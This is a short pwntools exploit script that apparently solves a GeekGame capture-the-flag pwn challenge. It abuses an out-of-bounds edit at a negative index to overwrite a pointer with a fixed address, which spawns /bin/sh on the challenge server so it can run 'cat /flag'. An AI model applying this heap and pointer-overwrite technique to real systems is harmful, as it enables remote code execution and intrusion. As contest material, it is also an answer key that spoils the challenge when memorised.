from pwn import *

conn = remote("prob13.geekgame.pku.edu.cn", 10013)
conn.recvuntil(b"Please input your token: ")
conn.send(b"<MY TOKEN>\n")
conn.recvuntil(b">>")
conn.send(b"1\n")
conn.recvuntil(b"node key:")
conn.send(b"0\n")
conn.recvuntil(b"size of the data:")
conn.send(b"8\n")
conn.recvuntil(b"data:")
conn.send(b"/bin/sh\0\n")
conn.recvuntil(b">>")
conn.send(b"1\n")
conn.recvuntil(b"node key:")
conn.send(b"1\n")
conn.recvuntil(b"size of the data:")
conn.send(b"8\n")
conn.recvuntil(b"data:")
conn.send(b"/bin/sh\0\n")
conn.recvuntil(b">>")
conn.send(b"3\n")
conn.recvuntil(b"want to edit:")
conn.send(b"1\n")
conn.recvuntil(b"want to edit:")
conn.send(b"-104\n")
conn.recvuntil(b"data:")
conn.send(p64(0x4010e0) + b"\n")
conn.recvuntil(b">>")
conn.send(b"3\n")
conn.recvuntil(b"want to edit:")
conn.send(b"0\n")
conn.send(b"cat /flag\n")
line = conn.recvline().decode()
while not line.startswith("flag{"):
  line = conn.recvline().decode()
print(line)
conn.close()
